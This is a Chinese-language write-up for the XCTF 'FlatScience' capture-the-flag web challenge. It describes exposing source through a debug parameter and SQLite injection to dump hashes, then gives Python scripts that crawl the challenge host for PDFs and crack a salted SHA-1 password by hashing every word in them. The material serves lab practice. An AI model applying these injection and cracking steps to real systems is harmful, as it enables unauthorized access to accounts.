FlatScience XCTF web进阶区FlatScience详解
目录扫描
日常扫描一波目录,发现了一个admin.php和login.php
测试注入,万能密码
去看看admin.php和login.php
admin.php 测试了下注入 没啥效果,审查元素看到题目也提示了,干不动这
再看看login.php,测试了下,报错了,nice,审查元素看到提示有个debug的参数
测试一下添加debug参数过后,暴露了源码,发现密码是sha1再加盐,最后再存到数据库的,看到了sqlite3 一脸懵逼这个sqlite用的太少了(主要是我太菜了~~~)然后就去学习了下sqlite相关的语法
https://www.cnblogs.com/xiaozi/p/5760321.html
果然有效果,之前暴露的代码里面就是把返回的结果设置到cookie里了,我们再把这个返回的数据解码一下
看到这个表里面有几个字段 查查账号密码和hint字段
看到这个hint 我感觉就非常不妙,说最喜欢的词在paper,我人傻了这么多url 还有pdf
但是莫法手动去找啊,一篇就是几千个单词,写程序吧。
获取所有的PDF的URL,并下载到本地,这里要用下递归
import re
import requests
regular_pdf = '[a-fA-F0-9]{32,32}.pdf'
regular_url = '\d/'
root_url = 'http://111.200.241.244:57162/'
pdf_list = []
def get_url(url):
result = requests.get(url + "index.html")
if result.status_code == 404:
return
re_url = re.findall(regular_url, result.text)
print(re_url)
re_pdf = re.findall(regular_pdf, result.text)
for pdf in re_pdf:
pdf_list.append(url + pdf)
if re_url:
for suffix_url in re_url:
get_url(url + suffix_url)
else:
return
def download_pdf(pdf_list):
for pdf_url in pdf_list:
result = requests.get(pdf_url)
file = open(r'/Users/yingjun/PycharmProjects/Test/pdf/' + pdf_url[-36:], 'wb')
file.write(result.content)
pass
get_url(root_url)
print(pdf_list)
download_pdf(pdf_list)
把PDF所有的单词全部搞出来 一个个加密对和密码对比
import hashlib
import pdfplumber
import os
crypto_password = '3fab54a50e770d830c0416df817567662a9dc85c'
words_list = []
pdf_path = []
root_path = '/Users/yingjun/PycharmProjects/Test/pdf/'
def crypto_str(word):
word = word + 'Salz!'
# print(word)
encrypts = hashlib.sha1(word.encode("utf-8")).hexdigest()
return encrypts
def get_content(path):
pdf = pdfplumber.open(path)
for page in pdf.pages:
content = page.extract_text()
words_list.extend(content.split(' '))
def get_pdf_name(path):
filelist = os.listdir(path)
for item in filelist:
pdf_path.append(item)
get_pdf_name(root_path)
for path in pdf_path:
get_content(root_path + path)
for word in words_list:
word = word.replace('\n', '')
encrypts = crypto_str(word)
if encrypts == crypto_password:
print("-------------------------找到了------------------------------------")
print(word)
找到了。nice!!!!ThinJerboa
登录拿Flag